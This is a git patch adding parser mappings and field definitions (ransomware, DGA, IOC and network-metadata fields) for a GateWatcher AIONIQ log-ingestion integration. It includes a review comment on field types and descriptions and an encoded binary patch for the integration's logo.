gatewatcher.matched_event.file.hash.md5: '{{json_load.message.matched_event.file.hash.md5}}' + gatewatcher.matched_event.file.hash.sha256: '{{json_load.message.matched_event.file.hash.sha256}}' + filter: '' + name: set + ransomware_detect: + actions: + - set: + gatewatcher.ransomware.session_score: '{{json_load.message.ransomware.session_score}}' + gatewatcher.ransomware.alert_threshold: '{{json_load.message.ransomware.alert_threshold}}' + gatewatcher.ransomware.malicious_behavior_confidence: '{{json_load.message.ransomware.malicious_behavior_confidence}}' + filter: '' + name: set + dga_detect: + actions: + - set: + gatewatcher.dga.top_DGA: '{{json_load.message.dga.top_DGA}}' + gatewatcher.dga.dga_count: '{{json_load.message.dga.dga_count}}' + gatewatcher.dga.dga_ratio: '{{json_load.message.dga.dga_ratio}}' + gatewatcher.dga.nx_domain_count: '{{json_load.message.dga.nx_domain_count}}' + gatewatcher.dga.malware_behavior_confidence: '{{json_load.message.dga.malware_behavior_confidence}}' + filter: '' + name: set + network_behavior_analytics: + actions: + - set: + gatewatcher.nba.gid: '{{json_load.message.nba.gid}}' + gatewatcher.nba.rev: '{{json_load.message.nba.rev}}' + gatewatcher.nba.action: '{{json_load.message.nba.action}}' + gatewatcher.nba.packet: '{{json_load.message.nba.packet}}' + gatewatcher.nba.stream: '{{json_load.message.nba.stream}}' + gatewatcher.nba.payload: '{{json_load.message.nba.payload}}' + gatewatcher.nba.category: '{{json_load.message.nba.category}}' + gatewatcher.nba.signature: '{{json_load.message.nba.signature}}' + gatewatcher.nba.signature_id: '{{json_load.message.nba.signature_id}}' + gatewatcher.nba.payload_printable: '{{json_load.message.nba.payload_printable}}' + gatewatcher.nba.metadata.performance_impact: '{{json_load.message.nba.metadata.performance_impact}}' + gatewatcher.nba.metadata.signature_severity: '{{json_load.message.nba.metadata.signature_severity}}' + filter: '' + name: set + ioc: + actions: + - set: + 
gatewatcher.ioc.tlp: '{{json_load.message.ioc.tlp}}' + gatewatcher.ioc.tags: '{{json_load.message.ioc.tags}}' + gatewatcher.ioc.type: '{{json_load.message.ioc.type}}' + gatewatcher.ioc.value: '{{json_load.message.ioc.value}}' + gatewatcher.ioc.case_id: '{{json_load.message.ioc.case_id}}' + gatewatcher.ioc.families: '{{json_load.message.ioc.families}}' + gatewatcher.ioc.campaigns: '{{json_load.message.ioc.campaigns}}' + gatewatcher.ioc.relations: '{{json_load.message.ioc.relations}}' + gatewatcher.ioc.signature: '{{json_load.message.ioc.signature}}' + gatewatcher.ioc.categories: '{{json_load.message.ioc.categories}}' + gatewatcher.ioc.usage_mode: '{{json_load.message.ioc.usage_mode}}' + gatewatcher.ioc.description: '{{json_load.message.ioc.description}}' + gatewatcher.ioc.package_date: '{{json_load.message.ioc.package_date}}' + gatewatcher.ioc.threat_actor: '{{json_load.message.ioc.threat_actor}}' + gatewatcher.ioc.updated_date: '{{json_load.message.ioc.updated_date}}' + gatewatcher.ioc.creation_date: '{{json_load.message.ioc.creation_date}}' + gatewatcher.ioc.meta_data.cwe: '{{json_load.message.ioc.meta_data.cwe}}' + gatewatcher.ioc.external_links: '{{json_load.message.ioc.external_links}}' + gatewatcher.ioc.targeted_sectors: '{{json_load.message.ioc.targeted_sectors}}' + gatewatcher.ioc.kill_chain_phases: '{{json_load.message.ioc.kill_chain_phases}}' + gatewatcher.ioc.targeted_countries: '{{json_load.message.ioc.targeted_countries}}' + gatewatcher.ioc.targeted_platforms: '{{json_load.message.ioc.targeted_platforms}}' + gatewatcher.ioc.meta_data.usageMode: '{{json_load.message.ioc.meta_data.usageMode}}' + gatewatcher.ioc.meta_data.descriptions: '{{json_load.message.ioc.meta_data.descriptions}}' + gatewatcher.ioc.targeted_organizations: '{{json_load.message.ioc.targeted_organizations}}' + filter: '' + name: set + From d3dee085d138a994e01955da45f52d60d53b4551 Mon Sep 17 00:00:00 2001 
From: Clement Lyonnet Date: Mon, 9 Sep 2024 17:46:36 +0200 Subject: [PATCH 008/317] V102 legacy: new custom fields, squared logo and new uuid for the manifest --- GateWatcher/aioniq/_meta/fields.yml | 331 ++++++++++++++++++++++++++ GateWatcher/aioniq/_meta/logo.png | Bin 16628 -> 41006 bytes GateWatcher/aioniq/_meta/manifest.yml | 2 +- 3 files changed, 332 insertions(+), 1 deletion(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index 45bc85ac2..d34cd4696 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml 
@@ -77,3 +77,334 @@ gatewatcher.type:
 description: Type of analysis
 name: gatewatcher.type
 type: keyword
+
+gatewatcher.calls:
+ description: This field represents the list of calls detected in a shellcode
+ name: gatewatcher.calls
+ type: text
+
+gatewatcher.campaigns:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.campaigns
+ type: text
+
+gatewatcher.case_id:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.case_id
+ type: text
+
+gatewatcher.categories:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.categories
+ type: text
+
+gatewatcher.description:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.description
+ type: text
+
+gatewatcher.dhcp:
+ description: This field represents the dhcp field in a network metadata (used in
+ legacy format log)
+ name: gatewatcher.dhcp
+ type: text
+
+gatewatcher.dnp3:
+ description: This field represents the dnp3 field in a suricata alert (used in legacy
+ format log)
+ name: gatewatcher.dnp3
+ type: text
+
+gatewatcher.domain_name:
+ description: This field represents the domain name found in a dga alert
+ name: gatewatcher.domain_name
+ type: text
+
+gatewatcher.encodings:
+ description: This field represents the encodings used in the shellcode
+ name: gatewatcher.encodings
+ type: text
+
+gatewatcher.external_links:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.external_links
+ type: text
+
+gatewatcher.families:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.families
+ type: text
+
+gatewatcher.fileinfo:
+ description: This field represents the fileinfo field in a malcore alert (used in
+ legacy format log)
+ name: gatewatcher.fileinfo
+ type: text
+
+gatewatcher.filemagic:
+ description: This field represents the magic of a file info
+ name: gatewatcher.filemagic
+ type: text
+
+gatewatcher.ftp:
+ description: This field represents the ftp field in a network metadata (used in
+ legacy format log)
+ name: gatewatcher.ftp
+ type: text
+
+gatewatcher.ftp_data:
+ description: This field represents the ftp-data field in a network metadata (used
+ in legacy format log)
+ name: gatewatcher.ftp_data
+ type: text
+
+gatewatcher.http2:
+ description: This field represents the http2 field in a network metadata (used in
+ legacy format log)
+ name: gatewatcher.http2
+ type: text
+
+gatewatcher.ikev2:
+ description: This field represents the ikev2 field in a network metadata (used in
+ legacy format log)
+ name: gatewatcher.ikev2
+ type: text
+
+gatewatcher.ioc_creation_date:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.ioc_creation_date
+ type: text
+
+gatewatcher.ioc_id:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.ioc_id
+ type: text
+
+gatewatcher.ioc_tags:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.ioc_tags
+ type: text
+
+gatewatcher.ioc_type:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.ioc_type
+ type: text
+
+gatewatcher.ioc_updated_date:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.ioc_updated_date
+ type: text
+
+gatewatcher.ioc_value:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.ioc_value
+ type: text
+
+gatewatcher.kill_chain_phases:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.kill_chain_phases
+ type: text
+
+gatewatcher.krb5:
+ description: This field represents the krb5 field in a network metadata (used in
+ legacy format log)
+ name: gatewatcher.krb5
+ type: text
+
+gatewatcher.matched_event:
+ description: This field represents the matched event found in a dga and retrohunt
+ alert
+ name: gatewatcher.matched_event
+ type: text
+
+gatewatcher.matched_event_type:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.matched_event_type
+ type: text
+
+gatewatcher.meta_data:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.meta_data
+ type: text
+
+gatewatcher.mqtt:
+ description: This field represents the mqtt field in a network metadata (used in
+ legacy format log)
+ name: gatewatcher.mqtt
+ type: text
+
+gatewatcher.nfs:
+ description: This field represents the nfs field in a network metadata (used in
+ legacy format log)
+ name: gatewatcher.nfs
+ type: text
+
+gatewatcher.payload:
+ description: This field represents the payload in a suricata alert
+ name: gatewatcher.payload
+ type: text
+
+gatewatcher.payload_printable:
+ description: This field represents the human readable payload in a suricata alert
+ name: gatewatcher.payload_printable
+ type: text
+
+gatewatcher.probability:
+ description: This field represents the probability found in a dga and retrohunt
+ alert
+ name: gatewatcher.probability
+ type: float
+
+gatewatcher.rdp:
+ description: This field represents the rdp field in a network metadata (used in
+ legacy format log)
+ name: gatewatcher.rdp
+ type: text
+
+gatewatcher.relations:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.relations
+ type: text
+
+gatewatcher.rfb:
+ description: This field represents the rfb field in a network metadata (used in
+ legacy format log)
+ name: gatewatcher.rfb
+ type: text
+
+gatewatcher.risk:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.risk
+ type: text
+
+gatewatcher.rpc:
+ description: This field represents the rpc field in a network metadata (used in
+ legacy format log)
+ name: gatewatcher.rpc
+ type: text
+
+gatewatcher.sample_id:
+ description: Matching legacy file_id with ECS sample_id
+ name: gatewatcher.sample_id
+ type: text
+
+gatewatcher.scores.analysis:
+ description: test-scores
+ name: gatewatcher.scores.analysis
+ type: number
+
+gatewatcher.scores.analysis_detailed:
+ description: test-scores
+ name: gatewatcher.scores.analysis_detailed
+ type: text
+
+gatewatcher.scores.proba_obfuscated:
+ description: test-scores
+ name: gatewatcher.scores.proba_obfuscated
+ type: float
+
+gatewatcher.signature:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.signature
+ type: text
+
+gatewatcher.sip:
+ description: This field represents the sip field in a network metadata (used in
+ legacy format log)
+ name: gatewatcher.sip
+ type: text
+
+gatewatcher.smb:
+ description: This field represents the smb field in a network metadata (used in
+ legacy format log)
+ name: gatewatcher.smb
+ type: text
+
+gatewatcher.smtp_email:
+ description: This field is used for smtp alerts
+ name: gatewatcher.smtp_email
+ type: text
+
+gatewatcher.snmp:
+ description: This field represents the snmp field in a network metadata (used in
+ legacy format log)
+ name: gatewatcher.snmp
+ type: text
+
+gatewatcher.ssh:
+ description: This field represents the ssh field in a network metadata (used in
+ legacy format log)
+ name: gatewatcher.ssh
+ type: text
+
+gatewatcher.stats:
+ description: This field represents the metrics stats
+ name: gatewatcher.stats
+ type: text
+
+gatewatcher.sub_type:
+ description: Sub type of codebreaker exploit
+ name: gatewatcher.sub_type
+ type: text
+
+gatewatcher.targeted_countries:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.targeted_countries
+ type: text
+
+gatewatcher.targeted_organizations:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.targeted_organizations
+ type: text
+
+gatewatcher.targeted_platforms:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.targeted_platforms
+ type: text
+
+gatewatcher.targeted_sectors:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.targeted_sectors
+ type: text
+
+gatewatcher.tftp:
+ description: This field represents the tftp field in a network metadata (used in
+ legacy format log)
+ name: gatewatcher.tftp
+ type: text
+
+gatewatcher.threat_actor:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.threat_actor
+ type: text
+
+gatewatcher.timestamp_package:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.timestamp_package
+ type: text
+
+gatewatcher.tlp:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.tlp
+ type: text
+
+gatewatcher.tls:
+ description: This field represents the tls field in a network metadata (used in
+ legacy format log)
+ name: gatewatcher.tls
+ type: text
+
+gatewatcher.ttp:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.ttp
+ type: text
+
+gatewatcher.usage_mode:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.usage_mode
+ type: text
+
+gatewatcher.vulnerabilities:
+ description: This field is used for retrohunt alerts
+ name: gatewatcher.vulnerabilities
+ type: text
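Review bot: The three `gatewatcher.scores.*` entries ship with the placeholder description `test-scores`, and `gatewatcher.scores.analysis` is the only field in this hunk typed `number` while the other numeric fields (`gatewatcher.probability`, `gatewatcher.scores.proba_obfuscated`) use `float`; the descriptions should say what is being scored (these look like the legacy counterparts of the `malicious_powershell.score` / `proba_obfuscated` mappings, to be confirmed) and the type should be one the schema already accepts, e.g. `type: float`. The identifier-like fields `gatewatcher.ioc_value`, `gatewatcher.ioc_id`, `gatewatcher.ioc_type`, `gatewatcher.case_id` and `gatewatcher.sample_id` are declared `type: text` whereas the existing `gatewatcher.type` context line is `keyword`; if `text` is analyzed here the way it is in Elasticsearch-style mappings, detection rules that need an exact match on an IOC value, or an aggregation by IOC type, will not behave as intended, so `type: keyword` is the safer choice for them. Likewise `gatewatcher.ioc_creation_date`, `gatewatcher.ioc_updated_date` and `gatewatcher.timestamp_package` are typed `text`, which rules out range queries on them; a date type, if the schema has one, would keep them searchable by time. Finally, `This field is used for retrohunt alerts` repeated on more than two dozen fields tells an analyst where the value comes from but not what it holds; one sentence on the content per field, e.g. `description: Campaigns associated with the matched IOC (retrohunt alerts)`, would make the field documentation usable.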
diff --git a/GateWatcher/aioniq/_meta/logo.png b/GateWatcher/aioniq/_meta/logo.png index f8b45a6a754e6f75f7bbb1c2e2d8a40a08c67aae..e933991caac7b495a081feda9ea336915ebd779f 100644 GIT binary patch literal 41006 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 